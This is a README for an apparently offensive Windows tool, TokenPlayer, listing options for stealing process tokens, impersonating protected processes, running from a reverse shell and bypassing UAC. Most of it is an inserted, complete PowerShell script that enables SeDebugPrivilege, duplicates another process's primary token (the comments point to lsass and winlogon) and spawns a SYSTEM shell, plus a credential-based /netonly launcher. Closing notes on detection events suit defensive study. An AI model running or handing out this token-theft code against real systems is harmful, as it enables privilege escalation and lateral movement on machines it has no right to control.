S1ckB0y1337/TokenPlayer

TokenPlayer

Abusing and Manipulating Windows Access Tokens.

TokenPlayer is a small tool I made to learn Win32 API programming and to better understand the Windows access token model.

Features:

  • Stealing and Impersonating primary tokens.
  • Impersonating Protected Processes.
  • It can be used from non-interactive contexts (e.g. a reverse shell) by using pipes for parent-child process communication.
  • Making new tokens for network authentication by providing credentials (similar to runas /netonly) without the need for special rights or elevated context.
  • Bypassing UAC by using the Token-Duplication method.

Usage:

General options:
  --help                 Display help menu.

Impersonation Options:
  --impersonate          Impersonates the specified pid and spawns a new child
                         process under its context.
  --pid arg              Process ID to steal the token from.
  --spawn                Spawns a new command prompt under the context of the
                         stolen token.

Execution Options:
  --exec                 Execute an instance of a specified program under the
                         impersonated context.
  --pid arg              Process ID to steal the token from.
  --prog                 The full path to the program to be executed.
  --args                 Optional execution arguments for the specified
                         program.

Make Token Options:
  --maketoken            Create a new process under a set of creds for only
                         network authentication (Similar to runas /netonly).
  --username arg         Username
  --password arg         Password in plaintext format.
  --domain arg           The domain the user belongs to; if no domain is
                         specified, the local machine is used.

UAC Bypass Options:
  --pwnuac               Will try to bypass UAC using the token-duplication
                         method.
  --spawn                Spawns a new elevated prompt.
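The two core operations behind the options above, as an added example that is not TokenPlayer's own code (the project is C++ with Boost): stealing a primary token from a PID and spawning a process under it (what --impersonate/--exec do), and creating a runas /netonly-style process from supplied credentials (what --maketoken does). It is written as PowerShell P/Invoke so it runs on any Windows host without compiling. The function names, the choice of access rights and the mapping to TokenPlayer's flags are assumptions; the Win32 calls and constants are the documented ones. The UAC token-duplication bypass is not reproduced, since the page gives no detail on how it is implemented.

```powershell
# Added example, not TokenPlayer's code. Run from an elevated PowerShell on Windows.
# Token theft needs SeDebugPrivilege (to open other users' processes) and
# SeImpersonatePrivilege (for CreateProcessWithTokenW); Start-NetOnlyProcess needs neither.
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class TokenApi {
    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    public struct STARTUPINFO {
        public uint cb; public string lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int impLevel, int type, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] public static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmd, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] public static extern bool CreateProcessWithLogonW(string user, string domain, string pass, uint logonFlags, string app, string cmd, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
"@
Add-Type -TypeDefinition $Win32
function Get-LastError { [Runtime.InteropServices.Marshal]::GetLastWin32Error() }

function Enable-Privilege([string]$Name) {
    # An elevated admin token holds SeDebugPrivilege but disabled; switch it on in our own token.
    $self = [IntPtr]::Zero
    if (-not [TokenApi]::OpenProcessToken([TokenApi]::GetCurrentProcess(), 0x28, [ref]$self)) {  # TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY
        throw "OpenProcessToken(self) failed: $(Get-LastError)"
    }
    $luid = New-Object TokenApi+LUID
    [void][TokenApi]::LookupPrivilegeValue($null, $Name, [ref]$luid)
    $tp = New-Object TokenApi+TOKEN_PRIVILEGES
    $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = 0x2            # SE_PRIVILEGE_ENABLED
    $ok = [TokenApi]::AdjustTokenPrivileges($self, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = Get-LastError
    [void][TokenApi]::CloseHandle($self)
    # AdjustTokenPrivileges returns TRUE even when the privilege is not held; ERROR_NOT_ALL_ASSIGNED (1300) is the real failure.
    if (-not $ok -or $err -eq 1300) { throw "$Name is not available to this token (error $err)" }
}

function Start-ProcessWithStolenToken([uint32]$TargetPid, [string]$Program = "$env:SystemRoot\System32\cmd.exe", [string]$Arguments = '') {
    Enable-Privilege 'SeDebugPrivilege'
    # PROCESS_QUERY_LIMITED_INFORMATION (0x1000) is all OpenProcessToken needs, and it is one of the few
    # rights a protected process (PPL) still grants to outsiders, so the same path works against e.g. lsass.
    $hProc = [TokenApi]::OpenProcess(0x1000, $false, $TargetPid)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($TargetPid) failed: $(Get-LastError)" }
    $hTok = [IntPtr]::Zero
    if (-not [TokenApi]::OpenProcessToken($hProc, 0xA, [ref]$hTok)) {         # TOKEN_DUPLICATE|TOKEN_QUERY
        throw "OpenProcessToken($TargetPid) failed: $(Get-LastError)"
    }
    # A new process needs a *primary* token: duplicate with MAXIMUM_ALLOWED, SecurityImpersonation (2), TokenPrimary (1).
    $hDup = [IntPtr]::Zero
    if (-not [TokenApi]::DuplicateTokenEx($hTok, 0x02000000, [IntPtr]::Zero, 2, 1, [ref]$hDup)) {
        throw "DuplicateTokenEx failed: $(Get-LastError)"
    }
    $si = New-Object TokenApi+STARTUPINFO; $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object TokenApi+PROCESS_INFORMATION
    # 0x10 = CREATE_NEW_CONSOLE: the child gets its own window when run interactively.
    $ok = [TokenApi]::CreateProcessWithTokenW($hDup, 0, $Program, "`"$Program`" $Arguments", 0x10, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    $err = Get-LastError
    foreach ($h in $hDup, $hTok, $hProc, $pi.hThread, $pi.hProcess) { [void][TokenApi]::CloseHandle($h) }
    if (-not $ok) { throw "CreateProcessWithTokenW failed: $err" }
    return $pi.dwProcessId
}

function Start-NetOnlyProcess([string]$Username, [string]$Password, [string]$Domain = '.', [string]$Program = "$env:SystemRoot\System32\cmd.exe") {
    # LOGON_NETCREDENTIALS_ONLY (0x2) is what runas /netonly uses: the child keeps the caller's local
    # identity and integrity level but presents $Username/$Password to remote hosts. LSA does not
    # validate the credentials at logon, so a wrong password only surfaces on the first network authentication.
    $si = New-Object TokenApi+STARTUPINFO; $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object TokenApi+PROCESS_INFORMATION
    $ok = [TokenApi]::CreateProcessWithLogonW($Username, $Domain, $Password, 0x2, $Program, "`"$Program`"", 0x10, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    if (-not $ok) { throw "CreateProcessWithLogonW failed: $(Get-LastError)" }
    [void][TokenApi]::CloseHandle($pi.hThread); [void][TokenApi]::CloseHandle($pi.hProcess)
    return $pi.dwProcessId
}

# Usage (equivalents of --impersonate/--exec and --maketoken). winlogon lives in the interactive
# session, so its SYSTEM token yields a visible cmd.exe; the credentials below are constructed.
#   Start-ProcessWithStolenToken -TargetPid (Get-Process winlogon)[0].Id
#   Start-NetOnlyProcess -Username 'svc_backup' -Password 'Hunter2!' -Domain 'CORP'
```

Two caveats a practitioner should keep in mind with either this example or the tool itself. A /netonly-style logon creates a new LSA logon session, so the host records a 4624 event with LogonType 9 (NewCredentials) even though no credentials were checked. And because --password takes the secret on the command line, any process-creation auditing that captures command lines (4688 with command-line logging, Sysmon event 1) stores it in clear text.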

Compile Instructions

To compile it yourself you will need to install the Boost library, which the project uses to parse and handle command-line arguments. You also need to point the project's settings at the folder containing that external library.
